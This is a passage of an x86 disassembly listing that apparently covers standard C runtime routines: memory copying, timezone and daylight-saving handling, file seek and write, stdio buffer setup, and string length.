pop edi
leave
retn
; END OF FUNCTION CHUNK FOR sub_404F90
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_404F90
loc_4050F0: ; CODE XREF: sub_404F90+35�j
; .data:00405022�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; END OF FUNCTION CHUNK FOR sub_404F90
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_404F90
loc_4050FC: ; CODE XREF: sub_404F90+35�j
; .data:00405022�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; END OF FUNCTION CHUNK FOR sub_404F90
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_404F90
loc_405110: ; CODE XREF: sub_404F90+35�j
; .data:00405022�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; END OF FUNCTION CHUNK FOR sub_404F90
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_404F90
loc_405128: ; CODE XREF: sub_404F90+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_40515C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_405150
std
rep movsd
cld
jmp off_405270[edx*4]
; END OF FUNCTION CHUNK FOR sub_404F90
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_404F90
loc_405150: ; CODE XREF: sub_404F90+1B1�j
; .data:00405198�j ...
neg ecx
jmp off_405220[ecx*4]
; END OF FUNCTION CHUNK FOR sub_404F90
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_404F90
loc_40515C: ; CODE XREF: sub_404F90+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_405174
and eax, 3
sub ecx, eax
jmp dword ptr loc_405174+4[eax*4]
; ---------------------------------------------------------------------------
loc_405174: ; CODE XREF: sub_404F90+1D6�j
; DATA XREF: sub_404F90+1DD�r
jmp off_405270[ecx*4]
; END OF FUNCTION CHUNK FOR sub_404F90
; ---------------------------------------------------------------------------
align 4
mov [ecx+40h], dl
add [eax-2FFFBFAFh], ch
push ecx
inc eax
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_405150
std
rep movsd
cld
jmp off_405270[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_405150
std
rep movsd
cld
jmp off_405270[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_405150
std
rep movsd
cld
jmp off_405270[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_405224
dd offset loc_40522C
dd offset loc_405234
dd offset loc_40523C
dd offset loc_405244
dd offset loc_40524C
dd offset loc_405254
off_405220 dd offset loc_405267 ; DATA XREF: sub_404F90+1C2�r
; ---------------------------------------------------------------------------
loc_405224: ; DATA XREF: .data:00405204�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_40522C: ; DATA XREF: .data:00405208�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_405234: ; DATA XREF: .data:0040520C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_40523C: ; DATA XREF: .data:00405210�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_405244: ; DATA XREF: .data:00405214�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_40524C: ; DATA XREF: .data:00405218�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_405254: ; DATA XREF: .data:0040521C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
; START OF FUNCTION CHUNK FOR sub_404F90
loc_405267: ; CODE XREF: sub_404F90+1C2�j
; DATA XREF: .data:off_405220�o
jmp off_405270[edx*4]
; END OF FUNCTION CHUNK FOR sub_404F90
; ---------------------------------------------------------------------------
align 10h
off_405270 dd offset loc_405280 ; DATA XREF: sub_404F90+1B7�r
; sub_404F90:loc_405174�r ...
dd offset loc_405288
dd offset loc_405298
dd offset loc_4052AC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404F90
loc_405280: ; CODE XREF: sub_404F90+1B7�j
; sub_404F90:loc_405174�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; END OF FUNCTION CHUNK FOR sub_404F90
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_404F90
loc_405288: ; CODE XREF: sub_404F90+1B7�j
; sub_404F90:loc_405174�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; END OF FUNCTION CHUNK FOR sub_404F90
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_404F90
loc_405298: ; CODE XREF: sub_404F90+1B7�j
; sub_404F90:loc_405174�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; END OF FUNCTION CHUNK FOR sub_404F90
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_404F90
loc_4052AC: ; CODE XREF: sub_404F90+1B7�j
; sub_404F90:loc_405174�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; END OF FUNCTION CHUNK FOR sub_404F90
; =============== S U B R O U T I N E =======================================
sub_4052C5 proc near ; CODE XREF: sub_403BB5:loc_403BF4�p
cmp dword_409CC8, 0
jnz short locret_4052D9
call sub_4052DA
inc dword_409CC8
locret_4052D9: ; CODE XREF: sub_4052C5+7�j
retn
sub_4052C5 endp
; =============== S U B R O U T I N E =======================================
sub_4052DA proc near ; CODE XREF: sub_4052C5+9�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
push edi
xor ebp, ebp
or ebx, 0FFFFFFFFh
push offset aTz ; "TZ"
xor edi, edi
mov dword_409C10, ebp
mov dword_4094E8, ebx
mov dword_4094D8, ebx
call sub_406904
mov esi, eax
pop ecx
cmp esi, ebp
jnz loc_405403
push offset dword_409C18
call dword_40807C
cmp eax, ebx
jz loc_405532
mov eax, dword_409C18
mov ecx, dword_409C6C
imul eax, 3Ch
cmp word_409C5E, bp
push 1
pop edx
mov dword_409440, eax
mov dword_409C10, edx
jz short loc_405351
mov esi, ecx
imul esi, 3Ch
add eax, esi
mov dword_409440, eax
loc_405351: ; CODE XREF: sub_4052DA+69�j
cmp word_409CB2, bp
jz short loc_405375
mov eax, dword_409CC0
cmp eax, ebp
jz short loc_405375
sub eax, ecx
mov dword_409444, edx
imul eax, 3Ch
mov dword_409448, eax
jmp short loc_405381
; ---------------------------------------------------------------------------
loc_405375: ; CODE XREF: sub_4052DA+7E�j
; sub_4052DA+87�j
mov dword_409444, ebp
mov dword_409448, ebp
loc_405381: ; CODE XREF: sub_4052DA+99�j
lea eax, [esp+14h+var_4]
mov esi, dword_4080C0
push eax
push ebp
push 3Fh
mov edi, 220h
push off_4094CC
push ebx
push offset dword_409C1C
push edi
push dword_409CFC
call esi
test eax, eax
jz short loc_4053BE
cmp [esp+14h+var_4], ebp
jnz short loc_4053BE
mov eax, off_4094CC
and byte ptr [eax+3Fh], 0
jmp short loc_4053C6
; ---------------------------------------------------------------------------
loc_4053BE: ; CODE XREF: sub_4052DA+D1�j
; sub_4052DA+D7�j
mov eax, off_4094CC
and byte ptr [eax], 0
loc_4053C6: ; CODE XREF: sub_4052DA+E2�j
lea eax, [esp+14h+var_4]
push eax
push ebp
push 3Fh
push off_4094D0
push ebx
push offset dword_409C70
push edi
push dword_409CFC
call esi
test eax, eax
jz loc_40552A
cmp [esp+14h+var_4], ebp
jnz loc_40552A
mov eax, off_4094D0
and byte ptr [eax+3Fh], 0
jmp loc_405532
; ---------------------------------------------------------------------------
loc_405403: ; CODE XREF: sub_4052DA+2D�j
cmp byte ptr [esi], 0
jz loc_405532
mov eax, dword_409CC4
cmp eax, ebp
jz short loc_405426
push eax
push esi
call sub_406880
pop ecx
test eax, eax
pop ecx
jz loc_405532
loc_405426: ; CODE XREF: sub_4052DA+139�j
push dword_409CC4
call sub_402B18
push esi
call sub_405B90
inc eax
push eax
call sub_4028C6
add esp, 0Ch
cmp eax, ebp
mov dword_409CC4, eax
jz loc_405532
push esi
push eax
call sub_4062D0
push 3
push esi
push off_4094CC
call sub_406780
mov eax, off_4094CC
add esi, 3
add esp, 14h
and byte ptr [eax+3], 0
cmp byte ptr [esi], 2Dh
jnz short loc_40547B
push 1
inc esi
pop edi
loc_40547B: ; CODE XREF: sub_4052DA+19B�j
push esi
call sub_402BE9
pop ecx
mov bl, 30h
mov ecx, eax
imul ecx, 0E10h
mov dword_409440, ecx
loc_405492: ; CODE XREF: sub_4052DA+1C7�j
mov al, [esi]
cmp al, 2Bh
jz short loc_4054A0
cmp al, bl
jl short loc_4054A3
cmp al, 39h
jg short loc_4054A3
loc_4054A0: ; CODE XREF: sub_4052DA+1BC�j
inc esi
jmp short loc_405492
; ---------------------------------------------------------------------------
loc_4054A3: ; CODE XREF: sub_4052DA+1C0�j
; sub_4052DA+1C4�j
cmp byte ptr [esi], 3Ah
jnz short loc_4054F6
inc esi
push esi
call sub_402BE9
imul eax, 3Ch
pop ecx
mov ecx, dword_409440
add ecx, eax
mov dword_409440, ecx
loc_4054C1: ; CODE XREF: sub_4052DA+1F2�j
mov al, [esi]
cmp al, bl
jl short loc_4054CE
cmp al, 39h
jg short loc_4054CE
inc esi
jmp short loc_4054C1
; ---------------------------------------------------------------------------
loc_4054CE: ; CODE XREF: sub_4052DA+1EB�j
; sub_4052DA+1EF�j
cmp byte ptr [esi], 3Ah
jnz short loc_4054F6
inc esi
push esi
call sub_402BE9
pop ecx
mov ecx, dword_409440
add ecx, eax
mov dword_409440, ecx
loc_4054E9: ; CODE XREF: sub_4052DA+21A�j
mov al, [esi]
cmp al, bl
jl short loc_4054F6
cmp al, 39h
jg short loc_4054F6
inc esi
jmp short loc_4054E9
; ---------------------------------------------------------------------------
loc_4054F6: ; CODE XREF: sub_4052DA+1CC�j
; sub_4052DA+1F7�j ...
cmp edi, ebp
jz short loc_405502
neg ecx
mov dword_409440, ecx
loc_405502: ; CODE XREF: sub_4052DA+21E�j
movsx eax, byte ptr [esi]
cmp eax, ebp
mov dword_409444, eax
jz short loc_40552A
push 3
push esi
push off_4094D0
call sub_406780
mov eax, off_4094D0
add esp, 0Ch
and byte ptr [eax+3], 0
jmp short loc_405532
; ---------------------------------------------------------------------------
loc_40552A: ; CODE XREF: sub_4052DA+10B�j
; sub_4052DA+115�j ...
mov eax, off_4094D0
and byte ptr [eax], 0
loc_405532: ; CODE XREF: sub_4052DA+40�j
; sub_4052DA+124�j ...
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_4052DA endp
; =============== S U B R O U T I N E =======================================
sub_405538 proc near ; CODE XREF: sub_403BB5+A5�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor edi, edi
cmp dword_409444, edi
jnz short loc_40554C
loc_405545: ; CODE XREF: sub_405538+148�j
; sub_405538+150�j ...
xor eax, eax
jmp loc_405698
; ---------------------------------------------------------------------------
loc_40554C: ; CODE XREF: sub_405538+B�j
mov esi, [esp+0Ch+arg_0]
push 1
pop ebx
mov eax, [esi+14h]
cmp eax, dword_4094D8
jnz short loc_40556A
cmp eax, dword_4094E8
jz loc_40566C
loc_40556A: ; CODE XREF: sub_405538+24�j
cmp dword_409C10, edi
jz loc_405642
movzx ecx, word_409CBE
push ecx
cmp word_409CB0, di
movzx ecx, word_409CBC
push ecx
movzx ecx, word_409CBA
push ecx
movzx ecx, word_409CB8
push ecx
jnz short loc_4055BC
movzx ecx, word_409CB4
push edi
push ecx
movzx ecx, word_409CB6
push ecx
movzx ecx, word_409CB2
push ecx
push eax
push ebx
jmp short loc_4055D0
; ---------------------------------------------------------------------------
loc_4055BC: ; CODE XREF: sub_405538+65�j
movzx ecx, word_409CB6
push ecx
push edi
movzx ecx, word_409CB2
push edi
push ecx
push eax
push edi
loc_4055D0: ; CODE XREF: sub_405538+82�j
push ebx
call sub_4056E4
movzx eax, word_409C6A
add esp, 2Ch
cmp word_409C5C, di
push eax
movzx eax, word_409C68
push eax
movzx eax, word_409C66
push eax
movzx eax, word_409C64
push eax
jnz short loc_40562A
movzx eax, word_409C60
push edi
push eax
movzx eax, word_409C62
push eax
movzx eax, word_409C5E
push eax
push dword ptr [esi+14h]
push ebx
loc_40561F: ; CODE XREF: sub_405538+108�j
push edi
call sub_4056E4
add esp, 2Ch
jmp short loc_40566C
; ---------------------------------------------------------------------------
loc_40562A: ; CODE XREF: sub_405538+C8�j
movzx eax, word_409C62
push eax
push edi
movzx eax, word_409C5E
push edi
push eax
push dword ptr [esi+14h]
push edi
jmp short loc_40561F
; ---------------------------------------------------------------------------
loc_405642: ; CODE XREF: sub_405538+38�j
push edi
push edi
push edi
push 2
push edi
push edi
push ebx
push 4
push eax
push ebx
push ebx
call sub_4056E4
push edi
push edi
push edi
push 2
push edi
push edi
push 5
push 0Ah
push dword ptr [esi+14h]
push ebx
push edi
call sub_4056E4
add esp, 58h
loc_40566C: ; CODE XREF: sub_405538+2C�j
; sub_405538+F0�j
mov edx, dword_4094DC
mov eax, dword_4094EC
mov ecx, [esi+1Ch]
cmp edx, eax
jge short loc_40569C
cmp ecx, edx
jl loc_405545
cmp ecx, eax
jg loc_405545
cmp ecx, edx
jle short loc_4056B0
cmp ecx, eax
jge short loc_4056B0
loc_405696: ; CODE XREF: sub_405538+166�j
; sub_405538+16A�j
mov eax, ebx
loc_405698: ; CODE XREF: sub_405538+F�j
; sub_405538+19D�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40569C: ; CODE XREF: sub_405538+144�j
cmp ecx, eax
jl short loc_405696
cmp ecx, edx
jg short loc_405696
cmp ecx, eax
jle short loc_4056B0
cmp ecx, edx
jl loc_405545
loc_4056B0: ; CODE XREF: sub_405538+158�j
; sub_405538+15C�j ...
mov eax, [esi+8]
imul eax, 3Ch
add eax, [esi+4]
imul eax, 3Ch
add eax, [esi]
imul eax, 3E8h
cmp ecx, edx
jnz short loc_4056D7
xor ecx, ecx
cmp eax, dword_4094E0
setnl cl
loc_4056D3: ; CODE XREF: sub_405538+1AA�j
mov eax, ecx
jmp short loc_405698
; ---------------------------------------------------------------------------
loc_4056D7: ; CODE XREF: sub_405538+18E�j
xor ecx, ecx
cmp eax, dword_4094F0
setl cl
jmp short loc_4056D3
sub_405538 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4056E4 proc near ; CODE XREF: sub_405538+99�p
; sub_405538+E8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 1
push ebx
mov ebx, [ebp+arg_8]
push esi
jnz loc_40577F
mov eax, [ebp+arg_C]
mov [ebp+arg_8], ebx
and [ebp+arg_8], 3
mov esi, eax
jnz short loc_40570F
shl esi, 2
mov eax, dword_4094F0[esi]
jmp short loc_405718
; ---------------------------------------------------------------------------
loc_40570F: ; CODE XREF: sub_4056E4+1E�j
shl esi, 2
mov eax, dword_409524[esi]
loc_405718: ; CODE XREF: sub_4056E4+29�j
mov edx, ebx
lea ecx, [eax+1]
imul edx, 16Dh
lea eax, [ebx-1]
push edi
sar eax, 2
mov edi, ecx
push 7
add edi, eax
lea eax, [edx+edi-63DBh]
pop edi
cdq
idiv edi
mov eax, [ebp+arg_10]
pop edi
cmp edx, [ebp+arg_14]
jge short loc_405752
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
lea ecx, [ecx+eax-7]
jmp short loc_40575C
; ---------------------------------------------------------------------------
loc_405752: ; CODE XREF: sub_4056E4+5E�j
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
add ecx, eax
loc_40575C: ; CODE XREF: sub_4056E4+6C�j
cmp [ebp+arg_10], 5
jnz short loc_40579A
cmp [ebp+arg_8], 0
jnz short loc_405770
mov esi, dword_4094F4[esi]
jmp short loc_405776
; ---------------------------------------------------------------------------
loc_405770: ; CODE XREF: sub_4056E4+82�j
mov esi, dword_409528[esi]
loc_405776: ; CODE XREF: sub_4056E4+8A�j
cmp ecx, esi
jle short loc_40579A
sub ecx, 7
jmp short loc_40579A
; ---------------------------------------------------------------------------
loc_40577F: ; CODE XREF: sub_4056E4+C�j
mov eax, [ebp+arg_C]
test bl, 3
jnz short loc_405790
mov ecx, dword_4094F0[eax*4]
jmp short loc_405797
; ---------------------------------------------------------------------------
loc_405790: ; CODE XREF: sub_4056E4+A1�j
mov ecx, dword_409524[eax*4]
loc_405797: ; CODE XREF: sub_4056E4+AA�j
add ecx, [ebp+arg_18]
loc_40579A: ; CODE XREF: sub_4056E4+7C�j
; sub_4056E4+94�j ...
cmp [ebp+arg_0], 1
jnz short loc_4057CB
mov eax, [ebp+arg_1C]
mov dword_4094DC, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
mov dword_4094D8, ebx
imul eax, 3Ch
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov dword_4094E0, eax
jmp short loc_405820
; ---------------------------------------------------------------------------
loc_4057CB: ; CODE XREF: sub_4056E4+BA�j
mov eax, [ebp+arg_1C]
mov dword_4094EC, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
imul eax, 3Ch
add eax, dword_409448
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov dword_4094F0, eax
jns short loc_405803
add eax, 5265C00h
dec ecx
mov dword_4094F0, eax
jmp short loc_405814
; ---------------------------------------------------------------------------
loc_405803: ; CODE XREF: sub_4056E4+110�j
mov edx, 5265C00h
cmp eax, edx
jl short loc_40581A
sub eax, edx
inc ecx
mov dword_4094F0, eax
loc_405814: ; CODE XREF: sub_4056E4+11D�j
mov dword_4094EC, ecx
loc_40581A: ; CODE XREF: sub_4056E4+126�j
mov dword_4094E8, ebx
loc_405820: ; CODE XREF: sub_4056E4+E5�j
pop esi
pop ebx
pop ebp
retn
sub_4056E4 endp
; =============== S U B R O U T I N E =======================================
sub_405824 proc near ; CODE XREF: sub_403C77+CD�p
; sub_4058BE+59�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push ebx
cmp eax, dword_518600
push esi
push edi
jnb short loc_4058A6
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:518500h[ecx*4]
shl esi, 3
mov ecx, [edi]
test byte ptr [ecx+esi+4], 1
jz short loc_4058A6
push eax
call sub_406A62
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_405868
mov dword_409A80, 9
jmp short loc_4058B7
; ---------------------------------------------------------------------------
loc_405868: ; CODE XREF: sub_405824+36�j
push [esp+0Ch+arg_8]
push 0
push [esp+14h+arg_4]
push eax
call dword_408040
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_405888
call dword_408044
jmp short loc_40588A
; ---------------------------------------------------------------------------
loc_405888: ; CODE XREF: sub_405824+5A�j
xor eax, eax
loc_40588A: ; CODE XREF: sub_405824+62�j
test eax, eax
jz short loc_405897
push eax
call sub_406981
pop ecx
jmp short loc_4058B7
; ---------------------------------------------------------------------------
loc_405897: ; CODE XREF: sub_405824+68�j
mov eax, [edi]
and byte ptr [eax+esi+4], 0FDh
lea eax, [eax+esi+4]
mov eax, ebx
jmp short loc_4058BA
; ---------------------------------------------------------------------------
loc_4058A6: ; CODE XREF: sub_405824+D�j
; sub_405824+2A�j
and dword_409A84, 0
mov dword_409A80, 9
loc_4058B7: ; CODE XREF: sub_405824+42�j
; sub_405824+71�j
or eax, 0FFFFFFFFh
loc_4058BA: ; CODE XREF: sub_405824+80�j
pop edi
pop esi
pop ebx
retn
sub_405824 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4058BE proc near ; CODE XREF: sub_403C77+95�p
; sub_403C77+E8�p ...
var_414 = byte ptr -414h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 414h
mov ecx, [ebp+arg_0]
push ebx
cmp ecx, dword_518600
push esi
push edi
jnb loc_405A52
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea ebx, ds:518500h[eax*4]
shl esi, 3
mov eax, [ebx]
mov al, [eax+esi+4]
test al, 1
jz loc_405A52
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
jnz short loc_40590F
loc_405908: ; CODE XREF: sub_4058BE+177�j
xor eax, eax
jmp loc_405A66
; ---------------------------------------------------------------------------
loc_40590F: ; CODE XREF: sub_4058BE+48�j
test al, 20h
jz short loc_40591F
push 2
push edi
push ecx
call sub_405824
add esp, 0Ch
loc_40591F: ; CODE XREF: sub_4058BE+53�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_4059EE
mov eax, [ebp+arg_4]
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+arg_0], edi
jbe loc_405A26
loc_40593F: ; CODE XREF: sub_4058BE+F5�j
lea eax, [ebp+var_414]
loc_405945: ; CODE XREF: sub_4058BE+B9�j
mov ecx, [ebp+var_4]
sub ecx, [ebp+arg_4]
cmp ecx, [ebp+arg_8]
jnb short loc_405979
mov ecx, [ebp+var_4]
inc [ebp+var_4]
mov cl, [ecx]
cmp cl, 0Ah
jnz short loc_405964
inc [ebp+var_10]
mov byte ptr [eax], 0Dh
inc eax
loc_405964: ; CODE XREF: sub_4058BE+9D�j
mov [eax], cl
inc eax
mov ecx, eax
lea edx, [ebp+var_414]
sub ecx, edx
cmp ecx, 400h
jl short loc_405945
loc_405979: ; CODE XREF: sub_4058BE+90�j
mov edi, eax
lea eax, [ebp+var_414]
sub edi, eax
lea eax, [ebp+var_C]
push 0
push eax
lea eax, [ebp+var_414]
push edi
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call dword_408048
test eax, eax
jz short loc_4059E3
mov eax, [ebp+var_C]
add [ebp+var_8], eax
cmp eax, edi
jl short loc_4059B5
mov eax, [ebp+var_4]
sub eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
jb short loc_40593F
loc_4059B5: ; CODE XREF: sub_4058BE+EA�j
; sub_4058BE+12E�j
xor edi, edi
loc_4059B7: ; CODE XREF: sub_4058BE+150�j
; sub_4058BE+15B�j
mov eax, [ebp+var_8]
cmp eax, edi
jnz loc_405A4D
cmp [ebp+arg_0], edi
jz short loc_405A26
push 5
pop eax
cmp [ebp+arg_0], eax
jnz short loc_405A1B
mov dword_409A80, 9
mov dword_409A84, eax
jmp loc_405A63
; ---------------------------------------------------------------------------
loc_4059E3: ; CODE XREF: sub_4058BE+E0�j
call dword_408044
mov [ebp+arg_0], eax
jmp short loc_4059B5
; ---------------------------------------------------------------------------
loc_4059EE: ; CODE XREF: sub_4058BE+69�j
lea ecx, [ebp+var_C]
push edi
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call dword_408048
test eax, eax
jz short loc_405A10
mov eax, [ebp+var_C]
mov [ebp+arg_0], edi
mov [ebp+var_8], eax
jmp short loc_4059B7
; ---------------------------------------------------------------------------
loc_405A10: ; CODE XREF: sub_4058BE+145�j
call dword_408044
mov [ebp+arg_0], eax
jmp short loc_4059B7
; ---------------------------------------------------------------------------
loc_405A1B: ; CODE XREF: sub_4058BE+10F�j
push [ebp+arg_0]
call sub_406981
pop ecx
jmp short loc_405A63
; ---------------------------------------------------------------------------
loc_405A26: ; CODE XREF: sub_4058BE+7B�j
; sub_4058BE+107�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_405A3B
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jz loc_405908
loc_405A3B: ; CODE XREF: sub_4058BE+16F�j
mov dword_409A80, 1Ch
mov dword_409A84, edi
jmp short loc_405A63
; ---------------------------------------------------------------------------
loc_405A4D: ; CODE XREF: sub_4058BE+FE�j
sub eax, [ebp+var_10]
jmp short loc_405A66
; ---------------------------------------------------------------------------
loc_405A52: ; CODE XREF: sub_4058BE+15�j
; sub_4058BE+37�j
and dword_409A84, 0
mov dword_409A80, 9
loc_405A63: ; CODE XREF: sub_4058BE+120�j
; sub_4058BE+166�j ...
or eax, 0FFFFFFFFh
loc_405A66: ; CODE XREF: sub_4058BE+4C�j
; sub_4058BE+192�j
pop edi
pop esi
pop ebx
leave
retn
sub_4058BE endp
; =============== S U B R O U T I N E =======================================
sub_405A6B proc near ; CODE XREF: sub_403C77+6C�p
arg_0 = dword ptr 4
inc dword_409CCC
push 1000h
call sub_4028C6
pop ecx
mov ecx, [esp+arg_0]
test eax, eax
mov [ecx+8], eax
jz short loc_405A94
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_405AA5
; ---------------------------------------------------------------------------
loc_405A94: ; CODE XREF: sub_405A6B+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_405AA5: ; CODE XREF: sub_405A6B+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_405A6B endp
; =============== S U B R O U T I N E =======================================
sub_405AAF proc near ; CODE XREF: sub_403C77+61�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_518600
jb short loc_405ABE
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_405ABE: ; CODE XREF: sub_405AAF+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_518500[ecx*4]
mov al, [ecx+eax*8+4]
and eax, 40h
retn
sub_405AAF endp
; =============== S U B R O U T I N E =======================================
sub_405AD5 proc near ; DATA XREF: .data:0040900C�o
mov eax, dword_5184E0
push esi
push 14h
test eax, eax
pop esi
jnz short loc_405AE9
mov eax, 200h
jmp short loc_405AEF
; ---------------------------------------------------------------------------
loc_405AE9: ; CODE XREF: sub_405AD5+B�j
cmp eax, esi
jge short loc_405AF4
mov eax, esi
loc_405AEF: ; CODE XREF: sub_405AD5+12�j
mov dword_5184E0, eax
loc_405AF4: ; CODE XREF: sub_405AD5+16�j
push 4
push eax
call sub_406A9F
pop ecx
mov dword_5174C8, eax
test eax, eax
pop ecx
jnz short loc_405B28
push 4
push esi
mov dword_5184E0, esi
call sub_406A9F
pop ecx
mov dword_5174C8, eax
test eax, eax
pop ecx
jnz short loc_405B28
push 1Ah
call sub_402FD6
pop ecx
loc_405B28: ; CODE XREF: sub_405AD5+30�j
; sub_405AD5+49�j
xor ecx, ecx
mov eax, offset off_409560
loc_405B2F: ; CODE XREF: sub_405AD5+6E�j
mov edx, dword_5174C8
mov [ecx+edx], eax
add eax, 20h
add ecx, 4
cmp eax, offset off_4097E0
jl short loc_405B2F
xor edx, edx
mov ecx, offset dword_409570
loc_405B4C: ; CODE XREF: sub_405AD5+A1�j
mov eax, edx
mov esi, edx
sar eax, 5
and esi, 1Fh
mov eax, dword_518500[eax*4]
mov eax, [eax+esi*8]
cmp eax, 0FFFFFFFFh
jz short loc_405B69
test eax, eax
jnz short loc_405B6C
loc_405B69: ; CODE XREF: sub_405AD5+8E�j
or dword ptr [ecx], 0FFFFFFFFh
loc_405B6C: ; CODE XREF: sub_405AD5+92�j
add ecx, 20h
inc edx
cmp ecx, offset dword_4095D0
jl short loc_405B4C
pop esi
retn
sub_405AD5 endp
; =============== S U B R O U T I N E =======================================
sub_405B7A proc near ; DATA XREF: .data:0040901C�o
; FUNCTION CHUNK AT 00406B1C SIZE 00000058 BYTES
call sub_406C0B
cmp byte_409AC0, 0
jz short locret_405B8D
jmp loc_406B1C
; ---------------------------------------------------------------------------
locret_405B8D: ; CODE XREF: sub_405B7A+C�j
retn
sub_405B7A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405B90 proc near ; CODE XREF: sub_403D8C:loc_40418C�p
; sub_404820+26�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_405BB0
loc_405B9C: ; CODE XREF: sub_405B90+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_405BE3
test ecx, 3
jnz short loc_405B9C
add eax, 0
